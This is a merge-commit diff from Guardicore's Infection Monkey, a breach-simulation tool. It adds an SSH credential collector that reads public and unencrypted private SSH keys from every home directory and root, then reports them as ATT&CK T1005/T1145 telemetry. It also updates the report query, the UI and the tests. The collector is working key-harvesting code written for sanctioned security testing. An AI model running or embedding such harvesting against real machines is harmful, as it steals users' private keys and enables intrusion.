Merge pull request #1717 from guardicore/1695-ssh-credential-collector

1695 ssh credential collector
This commit is contained in:
Mike Salvatore 2022-02-16 12:45:38 -05:00 committed by GitHub
commit 49f1675b38
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
11 changed files with 322 additions and 14 deletions

View File

@ -2,4 +2,5 @@ from .credential_components.nt_hash import NTHash
from .credential_components.lm_hash import LMHash
from .credential_components.password import Password
from .credential_components.username import Username
from .credential_components.ssh_keypair import SSHKeypair
from .mimikatz_collector import MimikatzCredentialCollector

View File

@ -0,0 +1,10 @@
from dataclasses import dataclass, field
from infection_monkey.i_puppet import CredentialType, ICredentialComponent
@dataclass(frozen=True)
class SSHKeypair(ICredentialComponent):
credential_type: CredentialType = field(default=CredentialType.SSH_KEYPAIR, init=False)
private_key: str
public_key: str

View File

@ -0,0 +1 @@
from .ssh_credential_collector import SSHCredentialCollector

View File

@ -0,0 +1,53 @@
import logging
from typing import Dict, Iterable, List
from infection_monkey.credential_collectors import SSHKeypair, Username
from infection_monkey.credential_collectors.ssh_collector import ssh_handler
from infection_monkey.i_puppet.credential_collection import Credentials, ICredentialCollector
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
logger = logging.getLogger(__name__)
class SSHCredentialCollector(ICredentialCollector):
"""
SSH keys credential collector
"""
def __init__(self, telemetry_messenger: ITelemetryMessenger):
self._telemetry_messenger = telemetry_messenger
def collect_credentials(self, _options=None) -> List[Credentials]:
logger.info("Started scanning for SSH credentials")
ssh_info = ssh_handler.get_ssh_info(self._telemetry_messenger)
logger.info("Finished scanning for SSH credentials")
return SSHCredentialCollector._to_credentials(ssh_info)
@staticmethod
def _to_credentials(ssh_info: Iterable[Dict]) -> List[Credentials]:
ssh_credentials = []
for info in ssh_info:
identities = []
secrets = []
if info.get("name", ""):
identities.append(Username(info["name"]))
ssh_keypair = {}
for key in ["public_key", "private_key"]:
if info.get(key) is not None:
ssh_keypair[key] = info[key]
if len(ssh_keypair):
secrets.append(
SSHKeypair(
ssh_keypair.get("private_key", ""), ssh_keypair.get("public_key", "")
)
)
if identities != [] or secrets != []:
ssh_credentials.append(Credentials(identities, secrets))
return ssh_credentials

View File

@ -0,0 +1,107 @@
import glob
import logging
import os
import pwd
from typing import Dict, Iterable
from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1005_telem import T1005Telem
from infection_monkey.telemetry.attack.t1145_telem import T1145Telem
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
logger = logging.getLogger(__name__)
DEFAULT_DIRS = ["/.ssh/", "/"]
def get_ssh_info(telemetry_messenger: ITelemetryMessenger) -> Iterable[Dict]:
home_dirs = _get_home_dirs()
ssh_info = _get_ssh_files(home_dirs, telemetry_messenger)
return ssh_info
def _get_home_dirs() -> Iterable[Dict]:
root_dir = _get_ssh_struct("root", "")
home_dirs = [
_get_ssh_struct(x.pw_name, x.pw_dir) for x in pwd.getpwall() if x.pw_dir.startswith("/home")
]
home_dirs.append(root_dir)
return home_dirs
def _get_ssh_struct(name: str, home_dir: str) -> Dict:
"""
Construct the SSH info. It consisted of: name, home_dir,
public_key and private_key.
public_key: contents of *.pub file (public key)
private_key: contents of * file (private key)
:param name: username of user, for whom the keys belong
:param home_dir: users home directory
:return: SSH info struct
"""
# TODO: There may be multiple public keys for a single user
# TODO: Authorized keys are missing.
return {
"name": name,
"home_dir": home_dir,
"public_key": None,
"private_key": None,
}
def _get_ssh_files(
usr_info: Iterable[Dict], telemetry_messenger: ITelemetryMessenger
) -> Iterable[Dict]:
for info in usr_info:
path = info["home_dir"]
for directory in DEFAULT_DIRS:
# TODO: Use PATH
if os.path.isdir(path + directory):
try:
current_path = path + directory
# Searching for public key
if glob.glob(os.path.join(current_path, "*.pub")):
# TODO: There may be multiple public keys for a single user
# Getting first file in current path with .pub extension(public key)
public = glob.glob(os.path.join(current_path, "*.pub"))[0]
logger.info("Found public key in %s" % public)
try:
with open(public) as f:
info["public_key"] = f.read()
# By default, private key has the same name as public,
# only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):
try:
with open(private) as f:
# no use from ssh key if it's encrypted
private_key = f.read()
if private_key.find("ENCRYPTED") == -1:
info["private_key"] = private_key
logger.info("Found private key in %s" % private)
telemetry_messenger.send_telemetry(
T1005Telem(
ScanStatus.USED, "SSH key", "Path: %s" % private
)
)
telemetry_messenger.send_telemetry(
T1145Telem(
ScanStatus.USED, info["name"], info["home_dir"]
)
)
else:
continue
except (IOError, OSError):
pass
# If private key found don't search more
if info["private_key"]:
break
except (IOError, OSError):
pass
except OSError:
pass
usr_info = [info for info in usr_info if info["private_key"] or info["public_key"]]
return usr_info

View File

@ -6,3 +6,4 @@ class CredentialType(Enum):
PASSWORD = 2
NT_HASH = 3
LM_HASH = 4
SSH_KEYPAIR = 5

View File

@ -0,0 +1,19 @@
from infection_monkey.telemetry.attack.attack_telem import AttackTelem
class T1145Telem(AttackTelem):
def __init__(self, status, name, home_dir):
"""
T1145 telemetry.
:param status: ScanStatus of technique
:param name: Username from which ssh keypair is taken
:param home_dir: Home directory where we found the ssh keypair
"""
super(T1145Telem, self).__init__("T1145", status)
self.name = name
self.home_dir = home_dir
def get_data(self):
data = super(T1145Telem, self).get_data()
data.update({"name": self.name, "home_dir": self.home_dir})
return data

View File

@ -1,7 +1,11 @@
import logging
from common.utils.attack_utils import ScanStatus
from monkey_island.cc.database import mongo
from monkey_island.cc.services.attack.technique_reports import AttackTechnique
logger = logging.getLogger(__name__)
class T1145(AttackTechnique):
tech_id = "T1145"
@ -12,19 +16,39 @@ class T1145(AttackTechnique):
# Gets data about ssh keys found
query = [
{"$match": {"telem_category": "attack", "data.technique": tech_id}},
{
"$match": {
"telem_category": "system_info",
"data.ssh_info": {"$elemMatch": {"private_key": {"$exists": True}}},
"$lookup": {
"from": "monkey",
"localField": "monkey_guid",
"foreignField": "guid",
"as": "monkey",
}
},
{
"$project": {
"_id": 0,
"machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"},
"ssh_info": "$data.ssh_info",
"monkey": {"$arrayElemAt": ["$monkey", 0]},
"status": "$data.status",
"name": "$data.name",
"home_dir": "$data.home_dir",
}
},
{
"$addFields": {
"_id": 0,
"machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"},
"monkey": 0,
}
},
{
"$group": {
"_id": {
"machine": "$machine",
"ssh_info": {"name": "$name", "home_dir": "$home_dir"},
}
}
},
{"$replaceRoot": {"newRoot": "$_id"}},
]
@staticmethod

View File

@ -10,13 +10,13 @@ class T1145 extends React.Component {
super(props);
}
static renderSSHKeys(keys) {
let output = [];
keys.forEach(function (keyInfo) {
output.push(<div key={keyInfo['name'] + keyInfo['home_dir']}>
SSH key pair used by <b>{keyInfo['name']}</b> user found in {keyInfo['home_dir']}</div>)
});
return (<div>{output}</div>);
static renderSSHKey(key) {
return (
<div>
<div key={key['name'] + key['home_dir']}>
SSH key pair used by <b>{key['name']}</b> user found in {key['home_dir']}
</div>
</div>);
}
static getKeysInfoColumns() {
@ -31,7 +31,7 @@ class T1145 extends React.Component {
{
Header: 'Keys found',
id: 'keys',
accessor: x => T1145.renderSSHKeys(x.ssh_info),
accessor: x => T1145.renderSSHKey(x.ssh_info),
style: {'whiteSpace': 'unset'}
}
]

View File

@ -0,0 +1,64 @@
from unittest.mock import MagicMock
import pytest
from infection_monkey.credential_collectors import SSHKeypair, Username
from infection_monkey.credential_collectors.ssh_collector import SSHCredentialCollector
from infection_monkey.i_puppet.credential_collection import Credentials
@pytest.fixture
def patch_telemetry_messenger():
return MagicMock()
def patch_ssh_handler(ssh_creds, monkeypatch):
monkeypatch.setattr(
"infection_monkey.credential_collectors.ssh_collector.ssh_handler.get_ssh_info",
lambda _: ssh_creds,
)
@pytest.mark.parametrize(
"ssh_creds", [([{"name": "", "home_dir": "", "public_key": None, "private_key": None}]), ([])]
)
def test_ssh_credentials_empty_results(monkeypatch, ssh_creds, patch_telemetry_messenger):
patch_ssh_handler(ssh_creds, monkeypatch)
collected = SSHCredentialCollector(patch_telemetry_messenger).collect_credentials()
assert not collected
def test_ssh_info_result_parsing(monkeypatch, patch_telemetry_messenger):
ssh_creds = [
{
"name": "ubuntu",
"home_dir": "/home/ubuntu",
"public_key": "SomePublicKeyUbuntu",
"private_key": "ExtremelyGoodPrivateKey",
},
{
"name": "mcus",
"home_dir": "/home/mcus",
"public_key": "AnotherPublicKey",
"private_key": None,
},
{"name": "guest", "home_dir": "/", "public_key": None, "private_key": None},
]
patch_ssh_handler(ssh_creds, monkeypatch)
# Expected credentials
username = Username("ubuntu")
username2 = Username("mcus")
username3 = Username("guest")
ssh_keypair1 = SSHKeypair("ExtremelyGoodPrivateKey", "SomePublicKeyUbuntu")
ssh_keypair2 = SSHKeypair("", "AnotherPublicKey")
expected = [
Credentials(identities=[username], secrets=[ssh_keypair1]),
Credentials(identities=[username2], secrets=[ssh_keypair2]),
Credentials(identities=[username3], secrets=[]),
]
collected = SSHCredentialCollector(patch_telemetry_messenger).collect_credentials()
assert expected == collected

View File

@ -0,0 +1,28 @@
import json
import pytest
from common.utils.attack_utils import ScanStatus
from infection_monkey.telemetry.attack.t1145_telem import T1145Telem
NAME = "ubuntu"
HOME_DIR = "/home/ubuntu"
STATUS = ScanStatus.USED
@pytest.fixture
def T1145_telem_test_instance():
return T1145Telem(STATUS, NAME, HOME_DIR)
def test_T1145_send(T1145_telem_test_instance, spy_send_telemetry):
T1145_telem_test_instance.send()
expected_data = {
"status": STATUS.value,
"technique": "T1145",
"name": NAME,
"home_dir": HOME_DIR,
}
expected_data = json.dumps(expected_data, cls=T1145_telem_test_instance.json_encoder)
assert spy_send_telemetry.data == expected_data
assert spy_send_telemetry.telem_category == "attack"